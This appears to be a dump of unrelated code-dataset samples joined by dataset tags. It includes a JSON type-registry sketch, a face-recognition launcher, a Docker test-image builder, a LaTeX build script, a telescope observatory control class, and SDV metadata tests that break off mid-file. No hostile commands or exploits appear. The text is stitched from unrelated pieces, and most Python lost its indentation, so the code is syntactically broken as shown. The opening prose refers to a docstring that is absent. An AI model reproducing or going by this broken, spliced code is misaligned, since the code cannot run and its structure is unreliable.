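The module docstring above describes the scheme: objects are converted to dicts carrying a `__type__` tag, and types must be registered explicitly so nothing is ever passed to `eval`. The following is a self-contained sketch of that idea using only the standard library; the registry, the `register_type` signature, and the `Point` class are illustrative stand-ins, not jaweson's actual API.
import json

SERIALISERS = {}


def register_type(cls, to_dict, from_dict):
    # Register explicit (de)serialisation callables instead of eval-ing type names.
    SERIALISERS[cls.__name__] = (cls, to_dict, from_dict)


class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y


register_type(
    Point,
    to_dict=lambda p: {'__type__': 'Point', 'x': p.x, 'y': p.y},
    from_dict=lambda d: Point(d['x'], d['y']),
)


def default(obj):
    # json.dumps hook: look the object's type up in the registry.
    cls_name = type(obj).__name__
    if cls_name in SERIALISERS:
        return SERIALISERS[cls_name][1](obj)
    raise TypeError('Unable to serialise object of type {}'.format(type(obj)))


def object_hook(jobj):
    # json.loads hook: dispatch on the embedded __type__ tag.
    if '__type__' in jobj and jobj['__type__'] in SERIALISERS:
        return SERIALISERS[jobj['__type__']][2](jobj)
    return jobj


payload = json.dumps(Point(1, 2), default=default)
restored = json.loads(payload, object_hook=object_hook)
print(payload, restored.x, restored.y)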
3210613 | <reponame>Jacky3213/face-recognition-system
from register import*
from live import*
if __name__ == '__main__':
root_path = '../data/NIR' ## images_NIR 20180625faceImages BGR
register_all(root_path)
test_live(root_path) | StarcoderdataPython |
46684 | <filename>dusty/systems/docker/testing_image.py<gh_stars>100-1000
from __future__ import absolute_import
import docker
from ...compiler.compose import container_code_path, get_volume_mounts
from ...compiler.spec_assembler import get_expanded_libs_specs
from ...log import log_to_client
from ...command_file import dusty_command_file_name, lib_install_commands_for_app_or_lib
from .common import spec_for_service
from . import get_docker_client
from ... import constants
class ImageCreationError(Exception):
def __init__(self, code):
self.code = code
message = 'Run exited with code {}'.format(code)
super(ImageCreationError, self).__init__(message)
def _ensure_base_image(app_or_lib_name):
testing_spec = _testing_spec(app_or_lib_name)
log_to_client('Getting the base image for the new image')
docker_client = get_docker_client()
if 'image' in testing_spec:
_ensure_image_pulled(testing_spec['image'])
return testing_spec['image']
elif 'build' in testing_spec:
image_tag = 'dusty_testing_base/image'
log_to_client('Need to build the base image based off of the Dockerfile here: {}'.format(testing_spec['build']))
try:
docker_client.remove_image(image=image_tag)
except:
log_to_client('Not able to remove image {}'.format(image_tag))
docker_client.build(path=testing_spec['build'], tag=image_tag)
return image_tag
def _ensure_image_pulled(image_name):
docker_client = get_docker_client()
full_image_name = image_name
if ':' not in image_name:
full_image_name = '{}:latest'.format(image_name)
for image in docker_client.images():
if full_image_name in image['RepoTags']:
break
else:
split = image_name.split(':')
repo, tag = split[0], 'latest' if len(split) == 1 else split[1]
docker_client.pull(repo, tag, insecure_registry=True)
def _get_split_volumes(volumes):
print volumes
split_volumes = []
for volume in volumes:
volume_list = volume.split(':')
split_volumes.append({'host_location': volume_list[0],
'container_location': volume_list[1]})
return split_volumes
def _get_create_container_volumes(split_volumes):
return [volume_dict['container_location'] for volume_dict in split_volumes]
def _get_create_container_binds(split_volumes):
binds_dict = {}
for volume_dict in split_volumes:
binds_dict[volume_dict['host_location']] = {'bind': volume_dict['container_location'], 'ro': False}
return binds_dict
def _create_tagged_image(base_image_tag, new_image_tag, app_or_lib_name):
docker_client = get_docker_client()
command = _get_test_image_setup_command(app_or_lib_name)
split_volumes = _get_split_volumes(get_volume_mounts(app_or_lib_name, get_expanded_libs_specs(), test=True))
create_container_volumes = _get_create_container_volumes(split_volumes)
create_container_binds = _get_create_container_binds(split_volumes)
container = docker_client.create_container(image=base_image_tag,
command=command,
volumes=create_container_volumes,
host_config=docker.utils.create_host_config(binds=create_container_binds))
docker_client.start(container=container['Id'])
log_to_client('Running commands to create new image:')
for line in docker_client.logs(container['Id'], stdout=True, stderr=True, stream=True):
log_to_client(line.strip())
exit_code = docker_client.wait(container['Id'])
if exit_code:
raise ImageCreationError(exit_code)
new_image = docker_client.commit(container=container['Id'])
try:
docker_client.remove_image(image=new_image_tag)
except:
log_to_client('Not able to remove image {}'.format(new_image_tag))
docker_client.tag(image=new_image['Id'], repository=new_image_tag, force=True)
docker_client.remove_container(container=container['Id'], v=True)
def _testing_spec(app_or_lib_name):
expanded_specs = get_expanded_libs_specs()
return spec_for_service(app_or_lib_name, expanded_specs)['test']
def test_image_name(app_or_lib_name):
return "dusty/test_{}".format(app_or_lib_name)
def _get_test_image_setup_command(app_or_lib_name):
return 'sh {}/{}'.format(constants.CONTAINER_COMMAND_FILES_DIR, dusty_command_file_name(app_or_lib_name))
def test_image_exists(app_or_lib_name):
image_name = test_image_name(app_or_lib_name)
docker_client = get_docker_client()
images = docker_client.images()
for image in images:
# Need to be careful, RepoTags can be explicitly set to None
repo_tags = image.get('RepoTags') or []
if image_name in repo_tags or '{}:latest'.format(image_name) in repo_tags:
return True
return False
def create_test_image(app_or_lib_name):
"""
Create a new test image by applying changes to the base image specified
in the app or lib spec
"""
log_to_client('Creating the testing image')
base_image_tag = _ensure_base_image(app_or_lib_name)
new_image_name = test_image_name(app_or_lib_name)
_create_tagged_image(base_image_tag, new_image_name, app_or_lib_name)
def update_test_image(app_or_lib_name):
"""
Apply updates to an existing testing image that has already been created
by Dusty - updating this test image should be quicker than creating a new
test image from the base image in the spec
"""
log_to_client('Updating the testing image')
if not test_image_exists(app_or_lib_name):
create_test_image(app_or_lib_name)
return
test_image_tag = test_image_name(app_or_lib_name)
_create_tagged_image(test_image_tag, test_image_tag, app_or_lib_name)
| StarcoderdataPython |
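The core flow in `_create_tagged_image` above is: start a container from the base image, run the generated setup command inside it, wait for it to exit, then commit the container as a new tagged image. Here is a rough sketch of that flow using the high-level `docker` SDK rather than the legacy low-level client Dusty uses; the base image, command, and tag values are placeholders, and the `wait()` return handling hedges across SDK versions.
import docker


def build_test_image(base_image='python:3.10-slim',
                     setup_command='sh -c "pip install pytest"',
                     new_tag='example/test-image'):
    client = docker.from_env()

    # Start a container from the base image and run the setup command in it.
    container = client.containers.run(base_image, setup_command, detach=True)

    # Wait for the command to finish; newer SDK versions return a dict here,
    # older ones return the exit code directly.
    result = container.wait()
    exit_code = result.get('StatusCode', 1) if isinstance(result, dict) else result
    if exit_code:
        raise RuntimeError('Setup command exited with code {}'.format(exit_code))

    # Snapshot the container's filesystem as a new, tagged image, then clean up.
    image = container.commit(repository=new_tag, tag='latest')
    container.remove(v=True)
    return image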
3319148 | import os
print("")
print(" Building report")
print("")
os.system("pdflatex manuel.tex")
os.system("makeindex manuel.tex")
os.system("pdflatex manuel.tex")
os.system("pdflatex manuel.tex")
print("")
print(" Clean directory")
print("")
files = ["manuel.aux", "manuel.log", "manuel.out", "manuel.glo", "manuel.ilg", "manuel.ind", "manuel.ist", "manuel.toc", "manuel.lof", "manuel.lot", "manuel.synctex.gz"]
for file in files:
if os.path.isfile(file):
os.remove(file) | StarcoderdataPython |
32182 | import time
from contextlib import suppress, contextmanager
from astropy import units as u
from panoptes.utils import error
from panoptes.utils.utils import get_quantity_value
from panoptes.utils.time import current_time, wait_for_events, CountdownTimer
from panoptes.pocs.observatory import Observatory
from panoptes.pocs.scheduler.observation.bias import BiasObservation
from huntsman.pocs.utils.logger import get_logger
from huntsman.pocs.guide.bisque import Guide
from huntsman.pocs.archive.utils import remove_empty_directories
from huntsman.pocs.scheduler.observation.dark import DarkObservation
from huntsman.pocs.utils.flats import make_flat_field_sequences, make_flat_field_observation
from huntsman.pocs.utils.flats import get_cameras_with_filter
from huntsman.pocs.utils.safety import get_solar_altaz
from huntsman.pocs.camera.group import CameraGroup, dispatch_parallel
from huntsman.pocs.error import NotTwilightError
class HuntsmanObservatory(Observatory):
def __init__(self, with_autoguider=True, hdr_mode=False, take_flats=True, logger=None,
*args, **kwargs):
"""Huntsman POCS Observatory
Args:
with_autoguider (bool, optional): If autoguider is attached, defaults to True.
hdr_mode (bool, optional): If pics should be taken in HDR mode, defaults to False.
take_flats (bool, optional): If flat field images should be taken, defaults to True.
logger (logger, optional): The logger instance. If not provided, use default Huntsman
logger.
*args: Parsed to Observatory init function.
**kwargs: Parsed to Observatory init function.
"""
if not logger:
logger = get_logger()
super().__init__(logger=logger, *args, **kwargs)
# Make a camera group
self.camera_group = CameraGroup(self.cameras)
self._has_hdr_mode = hdr_mode
self._has_autoguider = with_autoguider
self.flat_fields_required = take_flats
# Focusing
self.last_coarse_focus_time = None
self.last_coarse_focus_temp = None
self._coarse_focus_interval = self.get_config('focusing.coarse.interval_hours', 1) * u.hour
self._coarse_focus_filter = self.get_config('focusing.coarse.filter_name')
self._coarse_focus_temptol = self.get_config('focusing.coarse.temp_tol_deg', 5) * u.Celsius
self.last_fine_focus_time = None
self.last_fine_focus_temp = None
self._fine_focus_interval = self.get_config('focusing.fine.interval_hours', 1) * u.hour
self._fine_focus_temptol = self.get_config('focusing.fine.temp_tol_deg', 5) * u.Celsius
if self.has_autoguider:
self.logger.info("Setting up autoguider")
try:
self._create_autoguider()
except Exception as e:
self._has_autoguider = False
self.logger.warning(f"Problem setting autoguider, continuing without: {e!r}")
# Hack solution to the observatory not knowing whether it is safe or not
# This can be overridden when creating the HuntsmanPOCS instance
self._is_safe = None
# Properties
@property
def has_hdr_mode(self):
""" Does camera support HDR mode
Returns:
bool: HDR enabled, default False
"""
return self._has_hdr_mode
@property
def has_autoguider(self):
""" Does camera have attached autoguider
Returns:
bool: True if has autoguider
"""
return self._has_autoguider
@property
def coarse_focus_required(self):
""" Return True if we should do a coarse focus. """
return self._focus_required(coarse=True)
@property
def fine_focus_required(self):
""" Return True if we should do a fine focus. """
return self._focus_required()
@property
def is_past_midnight(self):
"""Check if it's morning, useful for going into either morning or evening flats."""
# Get the time of the nearest midnight to now
# If the nearest midnight is in the past, it's the morning
midnight = self.observer.midnight(current_time(), which='nearest')
return midnight < current_time()
@property
def is_twilight(self):
""" Return True if it is twilight, else False. """
return self.is_dark(horizon="twilight_max") and not self.is_dark(horizon="twilight_min")
@property
def temperature(self):
""" Return the ambient temperature. """
temp = None
try:
reading = self.db.get_current("weather")["data"]["ambient_temp_C"]
temp = get_quantity_value(reading, u.Celsius) * u.Celsius
except (KeyError, TypeError) as err:
self.logger.warning(f"Unable to determine temperature: {err!r}")
return temp
@property
def solar_altaz(self):
""" Return the current solar alt az. """
return get_solar_altaz(location=self.earth_location, time=current_time())
# Context managers
@contextmanager
def safety_checking(self, *args, **kwargs):
""" Check safety before and after the code block.
To be used with a "with" statement, e.g.:
with self.safety_checking():
print(x)
Args:
*args, **kwargs: Parsed to self._assert_safe
Raises:
RuntimeError: If not safe.
"""
self._assert_safe(*args, **kwargs)
try:
yield None
finally:
self._assert_safe(*args, **kwargs)
# Methods
def initialize(self):
"""Initialize the observatory and connected hardware """
super().initialize()
if self.has_autoguider:
self.logger.debug("Connecting to autoguider")
self.autoguider.connect()
def is_safe(self, park_if_not_safe=False, *args, **kwargs):
""" Return True if it is safe, else False.
Args:
*args, **kwargs: Parsed to self._is_safe. See panoptes.pocs.core.POCS.is_safe.
park_if_not_safe (bool): If True, park if safety fails. Default: False.
Returns:
bool: True if safe, else False.
"""
if self._is_safe is not None:
return self._is_safe(park_if_not_safe=park_if_not_safe, *args, **kwargs)
self.logger.warning("Safety function not set. Returning False")
return False
def remove_camera(self, cam_name):
""" Remove a camera from the observatory.
Args:
cam_name (str): The name of the camera to remove.
"""
super().remove_camera(cam_name)
with suppress(KeyError):
del self.camera_group.cameras[cam_name]
def autofocus_cameras(self, coarse=False, filter_name=None, default_timeout=900,
blocking=True, **kwargs):
""" Override autofocus_cameras to update the last focus time and move filterwheels.
Args:
coarse (bool, optional): Perform coarse focus? Default False.
filter_name (str, optional): The filter name to focus with. If None (default), will
attempt to get from config, by default using the coarse focus filter.
*args, **kwargs: Parsed to `pocs.observatory.Observatory.autofocus_cameras`.
Returns:
threading.Event: The autofocus event.
"""
focus_type = "coarse" if coarse else "fine"
# Choose the filter to focus with
# TODO: Move this logic to the camera level
if filter_name is None:
if coarse:
filter_name = self._coarse_focus_filter
else:
try:
filter_name = self.current_observation.filter_name
except AttributeError:
filter_name = self._coarse_focus_filter
self.logger.warning("Unable to retrieve filter name from current observation."
f" Defaulting to coarse focus filter ({filter_name}).")
# Asyncronously dispatch autofocus calls
with self.safety_checking(horizon="focus"):
events = self.camera_group.autofocus(coarse=coarse, filter_name=filter_name, **kwargs)
# Wait for sequences to finish
if blocking:
timeout = self.get_config(f"focusing.{focus_type}.timeout", default_timeout)
if not wait_for_events(list(events.values()), timeout=timeout):
raise error.Timeout(f"Timeout of {timeout} reached while waiting for fine focus.")
# Update last focus time
setattr(self, f"last_{focus_type}_focus_time", current_time())
# Update last focus temperature
setattr(self, f"last_{focus_type}_focus_temp", self.temperature)
return events
def cleanup_observations(self, *args, **kwargs):
""" Override method to remove empty directories. Called in housekeeping state."""
super().cleanup_observations(*args, **kwargs)
self.logger.info("Removing empty directories in images directory.")
images_dir = self.get_config("directories.images")
remove_empty_directories(images_dir)
self.logger.info("Removing empty directories in archive directory.")
archive_dir = self.get_config("directories.archive")
remove_empty_directories(archive_dir)
def take_flat_fields(self, cameras=None, **kwargs):
""" Take flat fields for each camera in each filter, respecting filter order.
Args:
cameras (dict): Dict of cam_name: camera pairs. If None (default), use all cameras.
**kwargs: Overrides config entries under `calibs.flat`.
"""
if cameras is None:
cameras = self.cameras
# Load the flat field config, allowing overrides from kwargs
flat_config = self.get_config('calibs.flat', default=dict())
flat_config.update(kwargs)
# Specify filter order
filter_order = flat_config['filter_order'].copy()
if self.is_past_midnight: # If it's the morning, order is reversed
filter_order.reverse()
# Take flat fields in each filter
for filter_name in filter_order:
if not (self.is_safe(horizon="twilight_max") and self.is_twilight):
raise RuntimeError("Not safe for twilight flats. Aborting.")
# Get a dict of cameras that have this filter
cameras_with_filter = get_cameras_with_filter(cameras, filter_name)
# Go to next filter if there are no cameras with this one
if not cameras_with_filter:
self.logger.warning(f'No cameras found with {filter_name} filter.')
continue
# Get the flat field observation
observation = make_flat_field_observation(self.earth_location, filter_name=filter_name)
observation.seq_time = current_time(flatten=True)
# Take the flats for each camera in this filter
self.logger.info(f'Taking flat fields in {filter_name} filter.')
autoflat_config = flat_config.get("autoflats", {})
try:
self._take_autoflats(cameras_with_filter, observation, **autoflat_config)
# Break out of loop if no longer twilight
# Catch the error so the state machine keeps running
except NotTwilightError as err:
self.logger.warning(f"{err!r}")
break
self.logger.info('Finished flat-fielding.')
def prepare_cameras(self, drop=True, *args, **kwargs):
""" Make sure cameras are all cooled and ready.
Args:
drop (bool): If True, drop cameras that do not become ready in time. Default: True.
*args, **kwargs: Parsed to self.camera_group.wait_until_ready.
"""
self.logger.info(f"Preparing {len(self.cameras)} cameras.")
failed_cameras = self.camera_group.wait_until_ready(*args, **kwargs)
# Remove cameras that didn't become ready in time
if drop:
for cam_name in failed_cameras:
self.logger.debug(f'Removing {cam_name} from {self} for not being ready.')
self.remove_camera(cam_name)
def take_observation_block(self, observation, cameras=None, timeout=60 * u.second,
remove_on_error=False, do_focus=True, safety_kwargs=None,
do_slew=True):
""" Macro function to take an observation block.
This function will perform:
- slewing (when necessary)
- fine focusing (when necessary)
- observation exposures
- safety checking
Args:
observation (Observation): The observation object.
cameras (dict, optional): Dict of cam_name: camera pairs. If None (default), use all
cameras.
timeout (float, optional): The timeout in addition to the exposure time. Default 60s.
remove_on_error (bool, default False): If True, remove cameras that timeout. If False,
raise a TimeoutError instead.
do_slew (bool, optional): If True, do not attempt to slew the telescope. Default
False.
**safety_kwargs (dict, optional): Extra kwargs to be parsed to safety function.
Raises:
RuntimeError: If safety check fails.
"""
if cameras is None:
cameras = self.cameras
safety_kwargs = {} if safety_kwargs is None else safety_kwargs
self._assert_safe(**safety_kwargs)
# Set the sequence time of the observation
if observation.seq_time is None:
observation.seq_time = current_time(flatten=True)
headers = self.get_standard_headers(observation=observation)
# Take the observation block
self.logger.info(f"Starting observation block for {observation}")
# The start new set flag is True before we enter the loop and is set to False
# immediately inside the loop. This allows the loop to start a new set in case
# the set_is_finished condition is already satisfied.
start_new_set = True
current_field = None
while (start_new_set or not observation.set_is_finished):
start_new_set = False # We don't want to start another set after this one
# Perform the slew if necessary
slew_required = (current_field != observation.field) and do_slew
if slew_required:
with self.safety_checking(**safety_kwargs):
self.slew_to_observation(observation)
current_field = observation.field
# Fine focus the cameras if necessary
focus_required = self.fine_focus_required or observation.current_exp_num == 0
if do_focus and focus_required:
with self.safety_checking(**safety_kwargs):
self.autofocus_cameras(blocking=True, filter_name=observation.filter_name)
# Set a common start time for this batch of exposures
headers['start_time'] = current_time(flatten=True)
# Start the exposures and get events
with self.safety_checking(**safety_kwargs):
events = self.camera_group.take_observation(observation, headers=headers)
# Wait for the exposures (blocking)
# TODO: Use same timeout as camera client
try:
self._wait_for_camera_events(events, duration=observation.exptime + timeout,
remove_on_error=remove_on_error, **safety_kwargs)
except error.Timeout as err:
self.logger.error(f"{err!r}")
self.logger.warning("Continuing with observation block after error.")
# Explicitly mark the observation as complete
with suppress(AttributeError):
observation.mark_exposure_complete()
self.logger.info(f"Observation status: {observation.status}")
def take_dark_observation(self, bias=False, **kwargs):
""" Take a bias observation block on each camera (blocking).
Args:
bias (bool, optional): If True, take Bias observation instead of dark observation.
Default: False.
**kwargs: Parsed to `self.take_observation_block`.
"""
# Move telescope to park position
if not self.mount.is_parked:
self.logger.info("Moving telescope to park position for dark observation.")
self.mount.park()
# Create the observation
# Keep the mount where it is since we are just taking darks
position = self.mount.get_current_coordinates()
ObsClass = BiasObservation if bias else DarkObservation
observation = ObsClass(position=position)
# Dark observations don't care if it's dark or not
safety_kwargs = {"ignore": ["is_dark"]}
# Can ignore weather safety if dome is closed
with suppress(AttributeError):
if self.dome.is_closed:
self.logger.warning(f"Ignoring weather safety for {observation}.")
safety_kwargs["ignore"].append("good_weather")
# Take the observation (blocking)
self.take_observation_block(observation, do_focus=False, do_slew=False,
safety_kwargs=safety_kwargs, **kwargs)
def slew_to_observation(self, observation, min_solar_alt=10 * u.deg):
""" Slew to the observation field coordinates.
Args:
observation (Observation): The observation object.
min_solar_alt (astropy.Quantity, optional): The minimum solar altitude above which the
FWs will be moved to their dark positions before slewing.
"""
self.logger.info(f"Slewing to target coordinates for {observation}.")
if not self.mount.set_target_coordinates(observation.field.coord):
raise RuntimeError(f"Unable to set target coordinates for {observation.field}.")
# Move FWs to dark pos if Sun too high to minimise damage potential
move_fws = self.solar_altaz.alt > get_quantity_value(min_solar_alt, u.deg) * u.deg
if move_fws:
self.logger.warning("Solar altitude above minimum for safe slew. Moving FWs to dark"
" positions.")
# Record curent positions so we can put them back after slew
# NOTE: These positions could include the dark position so can't use last_light_position
current_fw_positions = {}
for cam_name, cam in self.cameras.items():
if cam.has_filterwheel:
current_fw_positions[cam_name] = cam.filterwheel.current_filter
self.camera_group.filterwheel_move_to(current_fw_positions)
self.mount.slew_to_target()
if move_fws:
self.logger.info("Moving FWs back to last positions.")
self.camera_group.filterwheel_move_to(current_fw_positions)
# Private methods
def _create_autoguider(self):
guider_config = self.get_config('guider')
guider = Guide(**guider_config)
self.autoguider = guider
def _take_autoflats(
self, cameras, observation, target_scaling=0.17, scaling_tolerance=0.05, timeout=60,
bias=32, remove_on_error=False, sleep_time=300, evening_initial_flat_exptime=0.01,
morning_initial_flat_exptime=1, **kwargs):
""" Take flat fields using automatic updates for exposure times.
Args:
cameras (dict): Dict of camera name: Camera pairs.
observation: The flat field observation. TODO: Integrate with FlatFieldSequence.
target_scaling (float, optional): Required to be between [0, 1] so
target_adu is proportionally between 0 and digital saturation level.
Default: 0.17.
scaling_tolerance (float, optional): The minimum precision on the average counts
required to keep the exposure, expressed as a fraction of the dynamic range.
Default: 0.05.
timeout (float): The timeout on top of the exposure time, default 60s.
bias (int): The bias to subtract from the frames. TODO: Use a real bias image!
remove_on_error (bool, default False): If True, remove cameras that timeout. If False,
raise a TimeoutError instead.
**kwargs: Parsed to FlatFieldSequence.
"""
# set the initial exposure time
if self.is_past_midnight:
initial_exptime = morning_initial_flat_exptime
else:
initial_exptime = evening_initial_flat_exptime
# Create a flat field sequence for each camera
sequences = make_flat_field_sequences(cameras, target_scaling, scaling_tolerance,
bias, initial_exposure_time=initial_exptime, **kwargs)
# Loop until sequence has finished
self.logger.info(f"Starting flat field sequence for {len(self.cameras)} cameras.")
while True:
if not self.is_twilight:
raise NotTwilightError("No longer twilight. Aborting flat fields.")
# Slew to field
with self.safety_checking(horizon="twilight_max"):
self.slew_to_observation(observation)
# Get standard fits headers
headers = self.get_standard_headers(observation=observation)
events = {}
exptimes = {}
filenames = {}
start_times = {}
# Define function to start the exposures
def func(cam_name):
seq = sequences[cam_name]
camera = cameras[cam_name]
# Get exposure time, filename and current time
exptimes[cam_name] = seq.get_next_exptime(past_midnight=self.is_past_midnight)
filenames[cam_name] = observation.get_exposure_filename(camera)
start_times[cam_name] = current_time()
try:
events[cam_name] = camera.take_observation(
observation, headers=headers, filename=filenames[cam_name],
exptime=exptimes[cam_name])
except error.PanError as err:
self.logger.error(f"{err!r}")
self.logger.warning("Continuing with flat observation after error.")
# Start the exposures in parallel
dispatch_parallel(func, list(cameras.keys()))
# Wait for the exposures
self.logger.info('Waiting for flat field exposures to complete.')
duration = get_quantity_value(max(exptimes.values()), u.second) + timeout
try:
self._wait_for_camera_events(events, duration, remove_on_error=remove_on_error,
horizon="twilight_max")
except error.Timeout as err:
self.logger.error(f"{err!r}")
self.logger.warning("Continuing with flat observation after timeout error.")
# Mark the current exposure as complete
observation.mark_exposure_complete()
# Update the flat field sequences with new data
for cam_name in list(sequences.keys()):
# Remove sequence for any removed cameras
if cam_name not in self.cameras:
del sequences[cam_name]
continue
# Attempt to update the exposure sequence for this camera.
# If the exposure failed, use info from the last successful exposure.
try:
sequences[cam_name].update(filename=filenames[cam_name],
exptime=exptimes[cam_name],
time_start=start_times[cam_name])
except (KeyError, FileNotFoundError) as err:
self.logger.warning(f"Unable to update flat field sequence for {cam_name}:"
f" {err!r}")
# Log sequence status
status = sequences[cam_name].status
status["filter_name"] = observation.filter_name
self.logger.info(f"Flat field status for {cam_name}: {status}")
# Check if sequences are complete
if all([s.is_finished for s in sequences.values()]):
self.logger.info("All flat field sequences finished.")
break
# Check if counts are ok
if self.is_past_midnight:
# Terminate if Sun is coming up and all exposures are too bright
if all([s.min_exptime_reached for s in sequences.values()]):
self.logger.info(f"Terminating flat sequence for {observation.filter_name}"
f" filter because min exposure time reached.")
break
# Wait if Sun is coming up and all exposures are too faint
elif all([s.max_exptime_reached for s in sequences.values()]):
self.logger.info(f"All exposures are too faint. Waiting for {sleep_time}s")
self._safe_sleep(sleep_time, horizon="twilight_max")
else:
# Terminate if Sun is going down and all exposures are too faint
if all([s.max_exptime_reached for s in sequences.values()]):
self.logger.info(f"Terminating flat sequence for {observation.filter_name}"
f" filter because max exposure time reached.")
break
# Wait if Sun is going down and all exposures are too bright
                elif all([s.min_exptime_reached for s in sequences.values()]):
self.logger.info(f"All exposures are too bright. Waiting for {sleep_time}s")
self._safe_sleep(sleep_time, horizon="twilight_max")
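    # --- Hedged usage sketch (editor's addition, not part of the original module) ---
    # A scheduler might drive this flat-field routine once per filter during twilight,
    # roughly like the following (method and helper names are assumed, not verbatim):
    #
    #     for filter_name in ("g_band", "r_band"):                    # hypothetical filters
    #         observation = make_flat_field_observation(filter_name)  # hypothetical helper
    #         try:
    #             observatory.take_flat_fields(cameras=observatory.cameras,
    #                                          observation=observation,
    #                                          target_scaling=0.17,
    #                                          scaling_tolerance=0.05)
    #         except NotTwilightError:
    #             break  # twilight is over, stop taking flats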
def _wait_for_camera_events(self, events, duration, remove_on_error=False, sleep=1, **kwargs):
""" Wait for camera events to be set.
Args:
events (dict of camera_name: threading.Event): The events to wait for.
duration (float): The total amount of time to wait for (should include exptime).
remove_on_error (bool, default False): If True, remove cameras that timeout. If False,
raise a TimeoutError instead.
sleep (float): Sleep this long between event checks. Default 1s.
**kwargs: Parsed to self._assert_safe.
"""
self.logger.debug(f'Waiting for {len(events)} events with timeout of {duration}.')
timer = CountdownTimer(duration)
while not timer.expired():
# Check safety here
self._assert_safe(**kwargs)
# Check if all cameras have finished
if all([e.is_set() for e in events.values()]):
break
time.sleep(sleep)
# Make sure events are set
for cam_name, event in events.items():
if not event.is_set():
if remove_on_error:
self.logger.warning(f"Timeout while waiting for camera event on {cam_name}. "
"Removing from observatory.")
self.remove_camera(cam_name)
else:
raise error.Timeout(f"Timeout while waiting for camera event on {cam_name}.")
def _focus_required(self, coarse=False):
""" Check if a focus is required based on current conditions.
Args:
coarse (bool): If True, check if we need to do a coarse focus. Default: False.
Returns:
bool: True if focus required, else False.
"""
focus_type = "coarse" if coarse else "fine"
# If a long time period has passed then focus again
last_focus_time = getattr(self, f"last_{focus_type}_focus_time")
interval = getattr(self, f"_{focus_type}_focus_interval")
if last_focus_time is None: # If we haven't focused yet
self.logger.info(f"{focus_type} focus required because we haven't focused yet.")
return True
if current_time() - last_focus_time > interval:
self.logger.info(f"{focus_type} focus required because of time difference.")
return True
# If there has been a large change in temperature then we need to focus again
last_focus_temp = getattr(self, f"last_{focus_type}_focus_temp")
temptol = getattr(self, f"_{focus_type}_focus_temptol")
if (last_focus_temp is not None) and (self.temperature is not None):
if abs(last_focus_temp - self.temperature) > temptol:
self.logger.info(f"{focus_type} focus required because of temperature change.")
return True
return False
def _assert_safe(self, *args, **kwargs):
""" Raise a RuntimeError if not safe to continue.
TODO: Raise a custom error type indicating lack of safety.
Args:
*args, **kwargs: Parsed to self.is_safe.
"""
if not self.is_safe(*args, **kwargs):
raise RuntimeError("Safety check failed!")
def _safe_sleep(self, duration, interval=1, *args, **kwargs):
""" Sleep for a specified amount of time while ensuring safety.
A RuntimeError is raised if safety fails while waiting.
Args:
duration (float or Quantity): The time to wait.
interval (float): The time in between safety checks.
*args, **kwargs: Parsed to is_safe.
Raises:
RuntimeError: If safety fails while waiting.
"""
self.logger.debug(f"Safe sleeping for {duration}")
timer = CountdownTimer(duration)
while not timer.expired():
self._assert_safe(*args, **kwargs)
time.sleep(interval)
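    # --- Hedged usage sketch (editor's addition) ---
    # _safe_sleep is a drop-in replacement for time.sleep that keeps checking safety,
    # e.g. while waiting for the sky brightness to change between flat-field sets:
    #
    #     self._safe_sleep(30, horizon="twilight_max")  # raises RuntimeError if unsafe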
| StarcoderdataPython |
46837 | from unittest.mock import Mock, patch
import pandas as pd
import pytest
from faker import Faker
from faker.config import DEFAULT_LOCALE
from rdt.transformers.numerical import NumericalTransformer
from sdv.constraints.base import Constraint
from sdv.constraints.errors import MissingConstraintColumnError
from sdv.errors import ConstraintsNotMetError
from sdv.metadata import Table
class TestTable:
def test__get_faker_default_locale(self):
"""Test that ``_get_faker`` without locales parameter has default locale.
        The ``_get_faker`` method should return a Faker object localized to the default
        locale when no locales are specified explicitly.
Input:
- Field metadata from metadata dict.
Output:
- Faker object with default localization.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'company'
}
}
}
# Run
faker = Table.from_dict(metadata_dict)._get_faker(metadata_dict['fields']['foo'])
# Assert
assert isinstance(faker, Faker)
assert faker.locales == [DEFAULT_LOCALE]
def test__get_faker_specified_locales_string(self):
"""Test that ``_get_faker`` with locales parameter sets localization correctly.
The ``_get_faker`` should return a Faker object localized to the specified locale.
Input:
- Field metadata from metadata dict.
Output:
- Faker object with specified localization string.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'company',
'pii_locales': 'sv_SE'
}
}
}
# Run
faker = Table.from_dict(metadata_dict)._get_faker(metadata_dict['fields']['foo'])
# Assert
assert isinstance(faker, Faker)
assert faker.locales == ['sv_SE']
def test__get_faker_specified_locales_list(self):
"""Test that ``_get_faker`` with locales parameter sets localization correctly.
The ``_get_faker`` should return a Faker object localized to the specified locales.
Input:
- Field metadata from metadata dict.
Output:
- Faker object with specified list of localizations.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'company',
'pii_locales': ['en_US', 'sv_SE']
}
}
}
# Run
faker = Table.from_dict(metadata_dict)._get_faker(metadata_dict['fields']['foo'])
# Assert
assert isinstance(faker, Faker)
assert faker.locales == ['en_US', 'sv_SE']
def test__get_faker_method_pass_args(self):
"""Test that ``_get_faker_method`` method utilizes parameters passed in category argument.
The ``_get_faker_method`` method uses the parameters passed to it in the category argument.
Input:
- Faker object to create faked values with.
- Category tuple of category name and parameters passed to the method creating fake values.
Output:
- Fake values created with the specified method from the Faker object.
Utilizing the arguments given to it.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'ean'
}
}
}
metadata = Table.from_dict(metadata_dict)
# Run
fake_8_ean = metadata._get_faker_method(Faker(), ('ean', 8))
ean_8 = fake_8_ean()
fake_13_ean = metadata._get_faker_method(Faker(), ('ean', 13))
ean_13 = fake_13_ean()
# Assert
assert len(ean_8) == 8
assert len(ean_13) == 13
@patch('sdv.metadata.Table')
def test__make_anonymization_mappings(self, mock_table):
"""Test that ``_make_anonymization_mappings`` creates the expected mappings.
The ``_make_anonymization_mappings`` method should map values in the original
data to fake values for non-id fields that are labeled pii.
Setup:
- Create a Table that has metadata about three fields (one pii field, one id field,
and one non-pii field).
Input:
- Data that contains a pii field, an id field, and a non-pii field.
Side Effects:
- Expect ``_get_fake_values`` to be called with the number of unique values of the
pii field.
- Expect the resulting `_ANONYMIZATION_MAPPINGS` field to contain the pii field, with
the correct number of mappings and keys.
"""
# Setup
metadata = Mock()
metadata._ANONYMIZATION_MAPPINGS = {}
foo_metadata = {
'type': 'categorical',
'pii': True,
